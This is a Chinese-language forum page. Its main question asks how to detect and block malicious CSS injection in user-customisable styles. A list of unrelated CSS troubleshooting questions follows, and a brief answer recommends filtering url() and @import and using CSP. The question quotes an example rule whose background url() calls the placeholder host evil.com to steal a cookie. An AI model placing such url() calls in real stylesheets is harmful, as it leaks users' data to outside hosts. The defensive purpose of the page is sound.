前端项目里怎么用威胁情报检测恶意CSS注入?
最近在做安全审计,听说要关注威胁情报里的CSS注入风险,但我搞不清具体该查什么。我们项目用了动态加载用户自定义样式的功能,会不会有隐患?
比如下面这段用户可能提交的CSS:
.user-content {
background: url('https://evil.com/track?steal=cookie');
width: 100px;
height: 100px;
}这种写法浏览器会真的发请求吗?我该怎么在前端层面提前识别或拦截这类可疑样式?试过用CSP但好像对内联style限制不够严。
- 1
回答
23浏览
K8s部署前端应用后CSS样式加载不生效怎么办?
我在本地用Docker跑前端项目一切正常,但推到Kubernetes集群后,页面的CSS样式完全没加载,字体、布局都乱了。已经确认静态资源路径配置正确,也检查了Ingress转发规则。 这是我的关键C...
- 1
回答
29浏览
前端错误监控捕获不到CSS加载失败的问题怎么办?
我在用 Sentry 做前端错误监控,JS 报错都能正常上报,但 CSS 文件加载失败(比如 404)完全没被记录到,这让我很难排查线上样式异常的问题。 试过监听 window.onerror 和 a...
- 2
回答
62浏览
stylelint 在 PostCSS 中不生效是怎么回事?
我最近在项目里配置了 PostCSS 和 stylelint,想用它来规范团队的 CSS 写法。但不管怎么改规则,PostCSS 编译时都没报错,也不提示任何 stylelint 的警告或错误。我明明...
- 1
回答
28浏览
postcss-mixins 在 Vue 项目里怎么用?总是报 mixin 未定义
我在 Vue3 + Vite 项目里装了 postcss 和 postcss-mixins,也配好了插件,但写 mixin 的时候一直提示找不到。是不是语法不对? 我试过在 style 里直接写 @d...
- 2
回答
52浏览
前端安全审计时怎么判断CSS有没有安全风险?
最近在做项目的安全审计,听说CSS也可能有安全问题,比如XSS之类的。但我一直以为CSS是静态样式,不会执行代码,所以有点懵。 我试过用一些在线工具扫描,但没报错。不过我们有个动态加载用户自定义主题的...
- 2
回答
26浏览
Normalize.css在React项目中如何正确引入并生效?
在React项目里引入Normalize.css后样式没变化,应该怎么办?我之前在public/index.html里通过CDN引入过,但页面元素的默认样式还是没调整。后来又试着在App.js里用im...
- 2
回答
56浏览
微前端子应用CSS样式污染父应用怎么办?
我在用single-spa搭建微前端时,发现子应用的CSS会污染父应用页面。比如子应用用了.header { background: red },结果父应用的header也变红了。尝试过加命名空间和C...
- 2
回答
65浏览
微前端应用隔离时样式冲突怎么解决?CSS全局覆盖子应用组件怎么办?
我在用qianky进行微前端开发时遇到样式污染问题,主应用的CSS全局样式把子应用的按钮组件覆盖了。我给子应用加了CSS命名空间: /* 主应用CSS */ .button { background:...
- 2
回答
79浏览
Vue项目用CSS压缩后样式错乱怎么办?
最近在优化Vue项目时启用了CSS压缩,但压缩后样式完全乱了,文字重叠、颜色不对。检查配置也没发现问题,求解! 比如这个组件原本正常: 标题 内容文本 .card { border: 1px soli...
- 2
回答
53浏览
Parcel打包React项目时CSS样式不生效怎么办?
最近用Parcel打包React项目,发现导入的CSS文件样式完全没生效。我已经按官方文档配置了,代码也没报错,但页面就是没样式。之前用Webpack没问题,Parcel是不是有什么特殊设置? 比如在...
url()和@import语法,拦截可疑链接。简单粗暴但有效:记得同时配置CSP策略,限制只允许加载特定域名资源。这俩组合拳能解决大部分问题,别想太复杂。